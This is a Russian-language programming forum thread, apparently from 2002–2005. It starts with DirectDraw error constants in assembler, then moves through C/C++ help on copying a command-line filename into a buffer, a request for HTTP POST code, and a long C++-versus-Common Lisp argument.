DDERR_NOEXCLUSIVEMODE EQU 0887600e1h
DDERR_NOFLIPHW EQU 0887600e6h
DDERR_NOGDI EQU 0887600f0h
DDERR_NOMIRRORHW EQU 0887600fah
DDERR_NOTFOUND EQU 0887600ffh
DDERR_NOOVERLAYHW EQU 088760104h
DDERR_NORASTEROPHW EQU 088760118h
DDERR_NOROTATIONHW EQU 088760122h
DDERR_NOSTRETCHHW EQU 088760136h
DDERR_NOT4BITCOLOR EQU 08876013ch
DDERR_NOT4BITCOLORINDEX EQU 08876013dh
DDERR_NOT8BITCOLOR EQU 088760140h
DDERR_NOTEXTUREHW EQU 08876014ah
DDERR_NOVSYNCHW EQU 08876014fh
DDERR_NOZBUFFERHW EQU 088760154h
DDERR_NOZOVERLAYHW EQU 08876015eh
DDERR_OUTOFCAPS EQU 088760168h
DDERR_OUTOFMEMORY EQU 08007000eh
DDERR_OUTOFVIDEOMEMORY EQU 08876017ch
DDERR_OVERLAYCANTCLIP EQU 08876017eh
DDERR_OVERLAYCOLORKEYONLYONEACTIVE EQU 088760180h
DDERR_PALETTEBUSY EQU 088760183h
DDERR_COLORKEYNOTSET EQU 088760190h
DDERR_SURFACEALREADYATTACHED EQU 08876019ah
DDERR_SURFACEALREADYDEPENDENT EQU 0887601a4h
DDERR_SURFACEBUSY EQU 0887601aeh
DDERR_CANTLOCKSURFACE EQU 0887601b3h
DDERR_SURFACEISOBSCURED EQU 0887601b8h
DDERR_SURFACELOST EQU 0887601c2h
DDERR_SURFACENOTATTACHED EQU 0887601cch
DDERR_TOOBIGHEIGHT EQU 0887601d6h
DDERR_TOOBIGSIZE EQU 0887601e0h
DDERR_TOOBIGWIDTH EQU 0887601eah
DDERR_UNSUPPORTED EQU 080004001h
DDERR_UNSUPPORTEDFORMAT EQU 0887601feh
DDERR_UNSUPPORTEDMASK EQU 088760208h
DDERR_VERTICALBLANKINPROGRESS EQU 088760219h
DDERR_WASSTILLDRAWING EQU 08876021ch
DDERR_XALIGN EQU 088760230h
DDERR_INVALIDDIRECTDRAWGUID EQU 088760231h
DDERR_DIRECTDRAWALREADYCREATED EQU 088760232h
DDERR_NODIRECTDRAWHW EQU 088760233h
DDERR_PRIMARYSURFACEALREADYEXISTS EQU 088760234h
DDERR_NOEMULATION EQU 088760235h
DDERR_REGIONTOOSMALL EQU 088760236h
DDERR_CLIPPERISUSINGHWND EQU 088760237h
DDERR_NOCLIPPERATTACHED EQU 088760238h
DDERR_NOHWND EQU 088760239h
DDERR_HWNDSUBCLASSED EQU 08876023ah
DDERR_HWNDALREADYSET EQU 08876023bh
DDERR_NOPALETTEATTACHED EQU 08876023ch
DDERR_NOPALETTEHW EQU 08876023dh
DDERR_BLTFASTCANTCLIP EQU 08876023eh
DDERR_NOBLTHW EQU 08876023fh
DDERR_NODDROPSHW EQU 088760240h
DDERR_OVERLAYNOTVISIBLE EQU 088760241h
DDERR_NOOVERLAYDEST EQU 088760242h
DDERR_INVALIDPOSITION EQU 088760243h
DDERR_NOTAOVERLAYSURFACE EQU 088760244h
DDERR_EXCLUSIVEMODEALREADYSET EQU 088760245h
DDERR_NOTFLIPPABLE EQU 088760246h
DDERR_CANTDUPLICATE EQU 088760247h
DDERR_NOTLOCKED EQU 088760248h
DDERR_CANTCREATEDC EQU 088760249h
DDERR_NODC EQU 08876024ah
DDERR_WRONGMODE EQU 08876024bh
DDERR_IMPLICITLYCREATED EQU 08876024ch
DDERR_NOTPALETTIZED EQU 08876024dh
DDERR_UNSUPPORTEDMODE EQU 08876024eh
DDERR_NOMIPMAPHW EQU 08876024fh
DDERR_INVALIDSURFACETYPE EQU 088760250h
DDERR_DCALREADYCREATED EQU 08876026ch
DDERR_CANTPAGELOCK EQU 088760280h
DDERR_CANTPAGEUNLOCK EQU 088760294h
DDERR_NOTPAGELOCKED EQU 0887602a8h
DDERR_NOTINITIALIZED EQU 0800401f0h

----------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usC_ufa@mail.ru

shot_USC
26-09-2002, 00:43
Гым.) А че, переделать будет сложно что ли? :) Разница-то, насколько помню, вообще минимальная... синтаксис-то более или менее стандартизирован... ну определение структур перепишешь... еще кое-что... да в общем, понять же можно... зачем что-то еще искать?:)

Хых... ) Ну да... у насма синтаксис чем-то похож на синтаксис языков высокого уровня... ) Ну... мало схожего конечно... И все же что-то есть... мне тоже насм нравиться

------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

07-10-2002, 23:36
А реально ли ниписать терминал на VB6? Если да, то подскажите как. :)

shot_USC
09-10-2002, 02:20
Гыг...) а зачем тебе на барсике чего-то валять? Изучай Си.:) (да, я всех наверное уже задолбал, но не устану это повторять)

А как сие написать на сях, я те могу подсказать...

---------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

09-10-2002, 08:42
А я начал с Васика, потом набросился на Пасквиль, Делфи, ну а счаз не отрываюсь от сабжа.

11-10-2002, 14:35
а ХР енто екстремальной программирование обозначает :D

TPAKTOP
11-10-2002, 14:43
Это КОДЫ: 1001110010101100101001011101010100010011!!!

17-10-2002, 00:41
Есть где-нибудь какие-нибудь скрипты иль т.п. ДЛЯ ПОИСКА ПО ИНЕТУ? :confused: Вроде Яхуя Яндыркса, Рымблера... ? :confused:

17-10-2002, 00:43
А на нёма лехче кодировать... !но!... Слишком он... ну... для "ЧАЙНИЧКОВ" ;) :D

shot_USC
20-10-2002, 12:06
Кто про что, а лысый про расческу... (с)

-------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

Гатилов Илья
25-05-2003, 21:49
Помогите решить задачу:
Моделирование функционирования схемы, изображенной на экране монитора на алгоритмическом языке Ассемблер. Красный цвет соответствует еденичным сигналам, синий - нулевым. Входные сигналы задает поьзователь. Показать временную диаграмму работы функциональной схемы. Элемент моделирования - Синхронный Т-тригер. С уважением и благодарностью - Илья.

.:sk3tch:.
25-05-2003, 22:08
лол :)))) учить си... чтобы кодить на ПХП..... незнаю что для тебя есть "учить"......

Zight
19-06-2003, 04:02
Самый крутой язык это Delphi, правда для меня есть только один минус - большой размер компилированых прог :( В C проги получаются гораздо меньше, поэтому если пишешь троян выбирай C :)

Матроскин
23-06-2003, 00:18
Не, вот кроме троянов писать больше нечего?

ZX-SpectruM
23-06-2003, 03:25
уууу млинн.... пачему я такой тупой? Кагда разавьёца индустрия имплантов я паставлю себе такие же мазги как у тебя. А вот ищё чо, а перепеши варкрафт3 на движке фалаут тактикс, а? ну перепиши, а ?

Грима
24-06-2003, 00:36
В Дельфях размер больше, зато exe-файлы не требуют никаких дополнительных библиотек. В отличие от Визуал с++
2proMAN: синтаксис у Си и ПХП похож, но они независимы друг от друга

Матроскин
24-06-2003, 02:27
Ну да, расскажи еще сказку, требуют, при определенных условиях, надеюсь сам знаешь каких. По мне уж лучше билиотеки в инстальник включить.

ferrik
21-07-2003, 01:19
Скажите что на Си сделаешь а на дельфи нет?

Lamos
03-08-2003, 20:44
Млин торможу, короче нужен код на С.

Программа получает имя файла argv[1]через командную строку, надо записать это имя (не сам файл, а именно имя ) в массив buf. КАК ?
типа вот фрагмент программы:

#include"header.h"
void client(int readfd. int writefd, char* fname);
main(int argc, char* argv[]){
...........................................................

client(readfd, writefd, argv[1]);
}

void client (int readfd, int writefd, char* fname){
...................................
char buf[BUFSIZ];
........................................

я вот думал использовать , библиотечную функцию fgets. Ну короче все я торможу - я спать (( Если есть тута шарящие перцы плз
ответьте


ЗЫ: я знаю что вопрос глупый, но тем не менее
сейчас я не в состоянии его решить сам :)
ЗЗЫ: ногами не пинать.

shot_USC
04-08-2003, 04:14
Послано Lamos

Если я тебя правильно понял, тебе нужно записать в массив имя указанонго файла? Ну если так, то тут я тебе могу помочь:

Все, в общем-то, просто... небольшая программка, которая выводит на экран указаноне в качестве параметра имя файла:

===========| здесь начинается код |===========

#include <conio.h>
#include <string.h>
#include <iostream.h>

void main(int argc, char* argv[])
{
if(argc>1)
//проверяем момент присутствия параметра
{
char *BUF;
//создаем динамический
BUF = new char[strlen(argv[1])];
//массив для хранения имени файла
BUF = argv[1];
//записываем имя файла в буфер
cout<<BUF<<endl;
//выводим на экран содержимое буфера
getch();
//это чтобы ты смог полюбоваться на результат деятельности своего детища
delete BUF;
//сносим буфер из памяти
}
else
//если параметры не были переданы программе
{
cout<<"Хей! Чувак! Подружись с клавиатурой! Не указан обязательный параметр!"<<endl;
getch();
}
}

===========| здесь код заканчивается |===========

В общем, если посмотришь, поймешь и передашь таким образом параметры функции, что ты написал для этого. Если захочешь, я могу тебе написать, если ты дашь пояснение параметрам, что она имеет. Но в целом будет вот так:

===========| здесь начинается код |===========

#include <conio.h>
#include <string.h>
#include <iostream.h>

void client (int readfd, int writefd, char* fname)
{
char *BUF;
BUF = new char[strlen(fname)];
BUF = fname;
cout<<BUF<<endl;
getch();
delete BUF;
}

void main(int argc, char* argv[])
{
if(argc>1)
{
void client (NULL, NULL, argv[1]);
}
else
{
cout<<"Хей! Чувак! Подружись с клавиатурой! Не указан обязательный параметр!"<<endl;
getch();
}
}


===========| здесь код заканчивается |===========

А вообще, все просто:

Вся фишка в динамическом массиве. Мы создаем динамический массив символов. Создается он тким образом:

char *имя_массива = new char(int длинна_массива);

Для того, чтобы получить длину, в твоем случае, разумно использовать стандартную функцию

size_t strlen(const char *s);.

Все, что она делает, это возвращает длину строки.

Ну и все, а дальше просто записываем в наш динамический буфер строчку...

И не забудь удалить в конце свой динамически созданный массив... в этом тебе поможет delete ...

Ну вот и все... Надо же! Даже моим мозгам это окзалось под силу... ;)

P.S.> Надеюсь я правильно тебя понял... а то как-то беспонтова получится

---------------------
С уважением. shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

shot_USC
04-08-2003, 05:34
Вот блин, уже забыть успел о твоей проблеме, как левое яйцо сказало - "Баратан! А может ему не надо выводить имя файла вместе с путем? Тогда твоя муть ему не поможет!"... "Блин" - подумал я... "А ведь яйцо может быть право.. ладно, сейчас сделаем ему и такой вариант... Заодно мозги опробуем освежить... "...

=========| здесь начинается код |=========

#include <conio.h>
#include <string.h>
#include <iostream.h>

void copy_string(int begin, int end, char *input, char *output)
{
int count=0;
for(int temp=begin; temp<end; temp++)
{
input[count]=output[temp];
count++;
}
}

void client (int readfd, int writefd, char* fname)
{
int counter=strlen(fname);
while(fname[counter]!=0x5c)
{
counter--;
}
char *BUF;
BUF = new char[(strlen(fname)-counter)];
copy_string(counter+1, strlen(fname), BUF, fname);
cout<<BUF<<endl;
getch();
delete BUF;
}

void main(int argc, char* argv[])
{
if(argc>1)
{
client(NULL, NULL, argv[1]);
}
else
{
cout<<"Хей! Чувак! Подружись с клавиатурой! Не указан обязательный параметр!"<<endl;
getch();
}
}


=========| здесь заканчивается код |=========

В общем, тут мы все немного усложнили. Добавии функцию для вычленения конкретно имени файла из всего пути... Вот эту байдень - 0x5c мы использовали т.к. компилятор посылает на куй, если ему передать значение '\'... Поэтому так... А в целом, все, в общем-то, просто... я думаю разберешься... ;) Если уж я смог это написать, значит разобраться ты в этом сможешь стопудняк.. типа вот... что еще хочу сказать?... кхм... забыл.. ладно, не важно... удачи тебе!

P.S.>Пример выполнения проги:

\где-то_в_жопе_зарыта_наша_программа>proga.exe "C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\Свернуть все окна.scf"

Вывод программы:

Свернуть все окна.scf

это типа она вывела имя файла...

Фишка в том, что прога будет выводить только имя файла, без пути, не зависимо, укажешь ли ты ей файл, непосредственно из корневого каталога с исполняемым модулем твоей проги, или же откуда-то из жопы, с офигенно длинным путем... прога все-равно выведет только имя файла.. Думаю, такой вариант тебя устроит... Ладно, теперь все... уж точно.. Удачи! ;)

-------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

ТраНсПечаль
04-08-2003, 05:39
Спасибо чел, я думал-то никто и не ответит:). Хех, и все так четко разрулил, прям глаз радуется. Но не совсем то, что мне нужно было)). Дело в том, что я пишу на С (не на С++) под Linux... Ну, вообщем, я уже сам разобрался, но все равно спасибо.

А вот как я решил свою траблу:

#include"header.h"
main(int argc, char* argv[]){
char buf[BUFSIZ];
int len;
len=strlen(argv[1]);
snprintf(buf, sizeof(buf), "%s", argv[1]);
write(STDOUT_FILENO, buf, len);
}

Здесь я позволил себе опустить проверку наличия параметра и прочей лабуды;). А буфер мне нужен был фиксированного размера.

shot_USC
04-08-2003, 05:52
Послано ТраНсПечаль

А... блин... что-то я опять стормозил по ходу... ладно... ну, в общем, на С почти так же будет... единственное, что потоки не получится использовать... но я их и использовал только лишь для вывода на экран... а так, в целом... а тебе еще и фиксирвоанный размер нужен был.. блин, по ходу я ваще тормоз... ;)

Ну ладно, рад, что ты решил все сам...

P.S.> Блин, может на работу устроиться куда-нить опять, а?... а то что-то я старею.. жизнь пролетает... а я все как был рac****яeм, так им и остaлся...;)

--------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

boco
05-08-2003, 20:05
супер! более квадратный велосипед получился только у shot_usc. =)))

со всеми проверками:

shot_USC
05-08-2003, 21:46
Молоток! Возьми с полки пирожок! ;)

Не, серьезно, ты крут, что тут скажешь... когда-то я тоже быстро находил рациональные решенья... ;) Слова скажешь?... отчасти.. но не только... Этот пост не отмазка, нет, ни в коем случае... просто кое-что уточню...

1) Я плясал от данной в задании функции
void client (int readfd, int writefd, char* fname);. Я так понял, что ему нужно передать туда имя файла...

2) Я писал код, пытаясь сделать его наглядным, чтобы можно было легко понять, от того он выглядит несколько большеватым

3) Я писал его с подтекстом, вычленияя имя файла из всего пути, используя для этого "на месте" написанные функции, может не очень рационально, но лишь с тем, чтобы можно было легко понять ход моей мысли... код от этого стал еще больше

3) И наконец я использовал динамический массив, а не статический... естественно, короче от этог окод не станет...
... поэтому твой код получился более рациональным...

Зачем я это написал? А черт знает... сам уже не знаю... и даже жалею, что написал... ну да ладно, короче - ТЫ КРУТ, безусловно. ;)

P.S.> Сказал, как в лужу пернул... "зачем?" ... блин, да вот что-то меня пинает изнутри, говорит - "бля, чувак! да ты, епать твою ... совсем дегрод!"... ну и естесственно, пытался отмезаться наверное...

---------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

ТраНсПечаль
05-08-2003, 23:09
^^^ пальцы кидать не обязательно, можно было бы выразить свои мысли в более сдержанном тоне.

Спасибо за код, но мне он УЖЕ не нужен.

boco
06-08-2003, 00:00
опасно так думать. никогда нельзя упускать возможности чему-то научиться (если, конечно, хочешь этому чему-нибудь научиться). один из лучших способов (второй после чтения хороших учебников) научиться писать простенькие и эффективные программы на це, да еще и такие, которые при этом не теряли бы своей читабельности - это изучать чужие исходники. возьми исходники какой-нибудь не очень большой, но хорошо написанной программы. мне, например, нравится как пишет solar designer (http://www.openwall.com) и разбери по косточкам, почему здесь он писал так, а там - эдак.

ну и, конечно, как аппетит приходит во время еды, так и искусство писать красиво приходит с опытом. =)

ps. я долго думал, зачем ты написал "write(fileno(stdout), buf, strlen(buf));". единственное, что пришло в голову - это бутенковское высказывание о том, что printf()-де в libc ни фига не реентерабелен. только из-за этого написал "fputs(...)" - решил, может ты какую многопоточную программу пишешь... развей сомненья - зачем "write(...)" ? =)

boco
06-08-2003, 00:24
это гордыня. дави ее. как сказал марселас уоллес: "fuck pride" =)

ТраНсПечаль
06-08-2003, 00:47
5 баллов))

shot_USC
06-08-2003, 02:26
Хм... прислушавшись к своему разуму я услышал лишь тихий голос правого яйца - "Не ссы чувак! Все пучком, это уже давно не твое... так что живи и почаще почесывай меня..." .. Хм... а может оно право?

Наверное. Так что я лучше просто посмотрю, как народ будет решать траблы следующего чела... и только если все будут упорно молчать, я вставлю здесь свое маловесомое слово... ;)

------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

vdrive
07-08-2003, 00:11
Всем программерам(Shot'у в частности)
Необходимо написать программу на С(или на С#) посылающую http запрос такого вида:
(пример)
*********************************************

POST http://www.source.ru HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.source.ru
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: http://www.source.ru
Content-Length: 36
Pragma: no-cache


***********************************************

Заранее спасибо.

Trancer
07-08-2003, 20:40
приветствую своих пусть МЛАДШИХ но ПЕЕЧАЛЬНЫХ братьев

***Met@N***
09-08-2003, 01:39
C++ korosho znajuu

ТраНсПечаль
09-08-2003, 01:56
^^^^ Что ты хотел этим сказать? То, что ты хорошо знаешь С++ или то, что С++ хорошо???

Если первое, то это никого не интересует, имхо. Ну, а если второе.... Меня всегда удивляли люди, делающие подобные заявления, да еще без каких-либо аргументов.



А если говорить о языках программирования, то стоит упомянуть Smalltalk. Подробнее, здесь:http://www.smalltalk.ru/novice.html.

shot_USC
09-08-2003, 02:15
Бля, пацаны! Харе дебаты разводить! Помогите лучше человеку! Тут вопрос был опубликован! Если никто не хочет, я попробую... я пока молчу... жду ваших действий... давайте. )

P.S.> Блин... я пьян...

------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

shot_USC
09-08-2003, 02:18
Ну так давай, помоги челу! ;)

P.S.> Я не наезжаю.. просто жду.. если до полудня ничего не появится, то я вынужден буду помочь челу сам... а потом не надо меня пинать, типа нерационально, да типа квадрат у тебя а не велосипед! ;)

помогу и всё...

--------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

boco
09-08-2003, 03:07
ему ведь не помощь нужна, он хочет воспользоваться твоими мозгами. причем, не скрывая этого.

любишь, когда тебя трахают? сомневаюсь.

ps. а вообще, перцу скорее всего банального netcat'а хватит, ничего и писать не надо. http://www.atstake.com/research/tool...ork_utilities/

vdrive
09-08-2003, 16:27
2boco
На *** мне твой netcat не нужен, у меня у самого этих прог до ...(охуеть вообщем можно, как их много). Мне исходник нужен на
С/С++/С#.

2shot
Ты в Ugatu щас на каком курсе?
goto Остальным;

Остальным:
pls%) write

shot_USC
09-08-2003, 16:34
Отчислен... ;)

-----------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

boco
09-08-2003, 16:48
он с исходниками.

а вообще, я не понимаю, в чем проблема? создать сокет, соединить его, плюнуть в него текст, прочитать ответ, закрыть сокет.

man socket
man connect
man write
man read

vdrive
09-08-2003, 22:28
man'ы, man'ы => ай реалли не знаю факинг инглиш,
и под nix все равно не попрет у меня soft modem & drov pod nego ne pridumali.
(d-link dfm562is u kogo est' otdaite v moi dobrie lapi)

Так что: НАРОД, если вы знаете как отослать "http request header" нид хелп!!! (with comments pls)

зы | только не надо shell programming(etc) & ne win platforms & lang krome C/C++/C#

vdrive
12-08-2003, 19:59
Да ... вы офигенно мне помогли, кул программеры:(

boco
14-08-2003, 00:49
всегда пожалуйста. захочешь еще халявы - обращайся смело. =)

ВоЛк_ТрЯпОшНыЙ
14-08-2003, 02:30
на дельфях блин пиши там indi компонента есть indihttp, а в си затрахаешься

Матроскин
01-09-2003, 03:03
http://club.shelek.com/view.php?id=56&type=0 три статьи по WinSocks - хватит для начала.

Tims
17-12-2005, 16:27
да какая в попу разница какой язык программирования ?
однинаковые вещи можно делать что и на VS C++ и на Delphi, Pascal'e и С, PHP и .NET ...
:D

hardik
17-12-2005, 16:49
тока на некоторых языках ты это сделаешь быстрее а с другими ипаца буш долго

Nameless
18-12-2005, 05:30
Да-да, конечно :]] Пожалуйста, преврати любой из этих язычков в DSL для, например, управления окнами (т.е. чтобы, например, можно было естественно и непринужденно "сказать" что-либо вроде "положи окошко рядом с ближайшим окошком слева").

Языки, в которых нет defmacro - сосут не разгибаясь :]]]

Tims
18-12-2005, 22:07
defmacro можно везде сделать :rolleyes:

Nameless
18-12-2005, 22:25
Не-а. defmacro в Common Lisp работает на уровне языка (а следовательно - коду макроопределения доступны все возможности самого языка) а не на уровне препроцессора. Что и дает невъебенную мощь и гибкость. Ни в сях, ни в басиках и прочей аде этого не сделаешь принципиально.

Rom@ntic
18-12-2005, 22:48
Зато не нужна поддержка библиотек все включено в ехе файл
А большой размер не беда взял UPX да сжал экзешник до 80 % сжимает и вперед трояна гулять :)

Golf
18-12-2005, 23:22
на PHP это так, на Си думаю примерно также
$fp=fsockopen("www.source.ru",80);
fputs($fp,"POST HTTP/1.0\r\n");
fputs($fp,"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");
.
.
fputs($fp,"Connection:close\r\n");
fputs($fp,"\r\n");
--------------
это как послать запрос, только голову, но не сами переменные. Как послать переменные и читать ответ тоже очень легко :)

Tims
19-12-2005, 00:50
не знаю Лисп так глубоко, но в Сях есть ведь и шаблоны и перегрузка операций и т.п...

и вообще я не про удобство говорил языка, а про реализацию одинаковых вещей

RaceWarior
19-12-2005, 01:12
программирование микроконтроллеров..., а остальное покажется частьем)))

Nameless
19-12-2005, 01:23
Шаблоны - отдельный язык, не имеющий возможности пользоваться средствами самих плюсов (в отличие от CL, где макры пользуются всеми возможностями языка, в том числе и макрами). Представь, что плюсовый шаблон может воспользоваться для генерации кода условным оператором, операторами цикла, вызовами произвольных функций и т.п. - вот это была бы часть функционала defmacro.

А перегрузка операторов - убожество. "Неубожеством" была бы возможность определения новых операторов с произвольной (а не навязанной языком) семантикой - каковая и есть в Common Lisp.
Так я и говорю о том, что реализуемые средствами Common Lisp штучки на плюсах не сделаешь вообще никак.

Tims
19-12-2005, 19:07
ну-ну :D

так только может говорить человек, который к программированию имеет отношение как либо "слышал звон... и т.д" , либо "попробовал один раз - не получилосб"...

имхо, самое сложное в программировании - решать задачи оптизмизации.. (во всех смыслах этого слова) независимо от языка и платформы

Tims
19-12-2005, 19:17
ну вапервых язык Лисп атносицца к "знаковому" языку, и паэтаму реализацыя на нем вычислительных задач - это полный атсос у Си...

и во вторых, если уж Лисп имеет более высокий уровень, то кто мешает сделать на том же Си++ или Делфи Лисп-машину, для выполнения кода на лисп? (причем, обратное - неверно...Лисп по низкоуровнему программированию ваще сасет по полной :) )
более, я даже уверен что такие существуют, и работают наподобе как Делфи работает с MSSQL :-)

Nameless
20-12-2005, 03:59
ROTFL :] Common Lisp - язык компилируемый, и получаемый машинный код ничуть не хуже, чем получаемый при компиляции C. Причем, компиляторы, естественно, оптимизирующие ничуть не хуже сишных, и уж тем более - плюсовых. Просто писать надо уметь - понятно, что просто (+ x y) приведет к использованию generic function и соответствующим накладным расходам, но кто мешает при кодировании вычислительной задачи использовать типизированную операцию (например, (the (integer 32) (+ x y))), которая оттранслируется просто в соответствующую машинную инструкцию? В итоге компилированный CL часто обгоняет C и тем более плюсы на вычислительных задачах ввиду большей простоты оптимизации.
Писать неудобно. На плюсах, паскале и т.п. писать компиляторы может только садомазохист. Так что в действительности лисповые компиляторы пишутся следующим образом: на сях пишется только минимальный недокомпилятор недолиспа, который собирает следующий, более умелый stage уже из лисповых исходников, и так далее до победного конца.
Дважды ложное утверждение. Поскольку, во-первых, для решения низкоуровневых задач CL приспособлен ничуть не хуже C, а во-вторых - создание компилятора есть высокоуровневая задача :]

Собственно, у CL есть только один серьезный недостаток - необходимость таскать за собой толстенький runtime.

Tims
20-12-2005, 08:45
ну во первых... на CL ты не сделаешь оптимизации вычислений на низком уровне... как бы ты не изголялся, если будешь дальше спорить, то я тебе приведу оптимизированный код на С++ а ты мне тоже самое напишешь на Лиспе, ок?

ну насчет неудобства я не согласен по двум причинам...
1) что касается идентификаторов и сематники языка - тут на вкус и цвет...кто как привык

2) уродская польская запись все-таки в CL, а не С++... :)))))

напиши мне вот этот код на Лиспе:
(a>b)?((b>c)?b/(a+b+c) : c/(a+b+c)) : (a>c)?(a/(2*b*a+c) : a+b+c*c)

где a, b и с - это многомерный вектор длиной до 32 значений float и соответственно все операции - векторные

я даже представить себе не могу сколько десятков или сотен строк займет реализация на Лиспе ))))))))))

бла-бла-бла.... напиши мне на лиспе обработчик прерывания или реализацию ПДП :D

Nameless
20-12-2005, 13:50
Приводи :]]
Не-а. Поскольку правильное программирование на CL сводится к "превращению" CL в DSL с семантикой, идеально соответствующей решаемой задаче, в то время как в плюсах ты заранее ограничен семантикой плюсов. Что приводит к жутко уродливому коду.
Префиксная нотация куда толковее инфиксной. Как минимум, при использовании инфиксной нотации элиминируется такая излишняя сущность, как "приоритеты операторов", а сами операторы являются полноценными функциями со всеми вытекающими (возможность передать как аргумент и результат, замыкания и т.п.).
(if (> a b)
(if (> b c) (/ b (+ a b c)) (/ c (+ a b c)))
(if (> a c) (/ a (+ (* 2 a b) c)) (+ a b (* c c))))

update: отступы, естественно, съехали. *****
С чего бы ему занять кучу строк? Все выглядит точно так же, с поправкой на инфиксную нотацию и управляющие структуры. Или ты имеешь в виду само определение соответствующих операций над векторами? Так это делается в лиспе ничуть не сложнее и куда компактнее, чем в плюсах (это если не учитывать того, что векторные библиотеки для CL имеются, и самому что-либо доопределять на фиг не нужно) :]
Возможность написать обработчик прерывания или DMA (я правильно понял твое "ПДП"?) на том или ином языке зависит больше от инфраструктуры ОС, в которой это делается, чем от языка. В том же Linux для реализации обработчиков прерываний и т.п. нужно впендюрить в ядро лисповый рантайм, и тогда - легко. Или сразу реализовать ядро ОС как лисповый рантайм с соответствующими определениями (чем занимались в MIT и Symbolics).

P.S. Кстати, было бы жутко удобно: определяем, например, пространство портов ввода-вывода как массив с соответствующими aref и setf, после чего имеем возможность использовать все высокоуровневые операции над последовательностями и т.п., которые транслируются в соответствующие наборы in и out... И никаких перезагрузок, все легко и непринужденно переопределяется в рантайме :]]

Papa Slon
20-12-2005, 13:57
папробуй Си...только в рот не суй ))

MpaK999
20-12-2005, 14:24
плачу, религиозные войны и у кого длиньше :D

забейте на языки, скоро вообще все можно будет визуально делать :D :cool:

Nameless
20-12-2005, 15:30
"Делать визуально" крайне неудобно, поскольку требует действий человека даже там, где они на самом деле не нужны. Да и вообще - выразительные способности языка куда выше, чем у "картинок".

Nameless
20-12-2005, 15:32
Не-а. Объективное сопоставление качеств инструментов и способов их использования.

MpaK999
20-12-2005, 17:21
языки под соответсвующие задачи очень удобно, но есть некие стандарты, есть за что платят и т.п.
Лисп для меня теперь уже сумбурен, как и хаскель и т.п.

Nameless
20-12-2005, 20:27
Платят - за решение задачи. Моему начальству глубоко пох, какими именно средставми я решаю задачу, если она решена. И это - единственный правильный вариант.

P.S. А хаскель таки рулит. Прелесть язычок, хоть по мощи до лиспа и не дотягивает.

Tims
20-12-2005, 22:25
вазможна я недаацениваю лисп...
па учебе тока знаю ansi lisp ))
хоть один из старых языков и стоит в одной линейке с фортраном или прологом...
хатя в то время ученные гаварилил шта лисп-это язык будущего....
думаю стоит верить, веть память на магнитных сердечниках в ту пору тоже была памятью будущего...всетаки после застоя пащти в 20 лет..эта уже усовершенствованная память займет устойчивое место на рынке (как мимнимум лет черес 5) ...

зы: пра память см FRAM ....

Nameless
20-12-2005, 23:02
Ты его просто плохо знаешь (потому как плохо преподают). ANSI Common Lisp - это стандарт такой, и существует куча живых и развивающихся реализаций.
Собственно, это будущее уже наступило. В свое время для лиспа не хватало памяти (полноценный рантайм довольно-таки прожорлив в этом плане).

RaceWarior
20-12-2005, 23:36
имхо... так может говорить человек, который может и имеет отношение к програмиированию, возможно даже что-то может написать на языках высокого уровня, но не имеющий ни капельки уважения к другим программистам и имеющий самааценку величиной с состояние билли гейтса...

Вижу асм ты не знаешь...

Да и выводу у тебя какие-то преждевременные...

Max Snake
20-12-2005, 23:38
что бы было с отсытупами, вставь код внутрь тегов [ php ] ... [ / php ], еще и раскраска будет, правда естественно php'шная.


Nameless
20-12-2005, 23:39
Само по себе программирование на ассемблере - задача тривиальная. Так что тут Тимс вполне прав. Ну или поясни, в чем на твой взгляд заключается сложность :]

Nameless
20-12-2005, 23:40
Thx.

RaceWarior
21-12-2005, 00:25
Программирование на ассемблере - задача в чем-то действительно тривиальная. Но, как мне кажется, программирование микроконтроллеров, - заставляет как нельзя лучше задумываться об оптимизации. Вообще, тема, как я понял, какой язык "самы крутой", - я высказал своё мнение, что для меня является наиболее сложным.

А вообще, мне кажется, нельзя делать какое-то разделение языков по "крутости" ... Каждый язык создавался для возможности реализации на нём решений относительно широкого спектра задач в возможно нечётко определённой области...

Каждый язык хорош по своему... В асме можно написать супер быструю программу, которая будет занимать очень мало места... на это уйдёт уйма времени = > денег...
.... ну и так далее мона размышять сколь угодно относительно остальных языков...

Nameless
21-12-2005, 00:42
Если именно в таком виде - то без вопросов.
И, помимо этого, она будет непереносима, в то время как даже программы на таком низкоуровневом языке как C, будучи правильно написанной, соберется и заработает на всех соответствующих стандартам платформах. Т.е. программирование на асме оправдано только в очень ограниченном числе случаев (для того же MSC-51 и всяких атмелей это иногда бывает оптимальным решением).

RaceWarior
21-12-2005, 00:55
Всё верно! Во всём согласен!

Только Си... эт кажется не низкоуровневый язык..., хотя точно не могу сказать, лет 7-5 назад когда изучал его, в книжке помню было написано, что он вроде бы как считается высокого уровня... но лучше его позиционировать как язык "среднего" уровня...

Nameless
21-12-2005, 01:02
Больше всего мне понравилось определение "portable assembler" :] Ни прибавить, ни убавить :]]

Lutcifer
21-12-2005, 11:43
Respect for ALL!!
Ребьята, а кто из вас кодит на ПХП??
Мне нужен квалифицированный учитель!!
(заранее спасибо за помощь, если таковой найдётся)

MpaK999
21-12-2005, 14:47
Lutcifer
че по деньгам?

MpaK999
21-12-2005, 14:49
все таки большой проект пишут командно (решают коллективом), коллективы пишущие все же на Лиспе и т.п. у нас редки (я не встречал), VC++, Delphi

Nameless
21-12-2005, 14:54
Места знать надо! (с) :]]

Tims
22-12-2005, 00:33
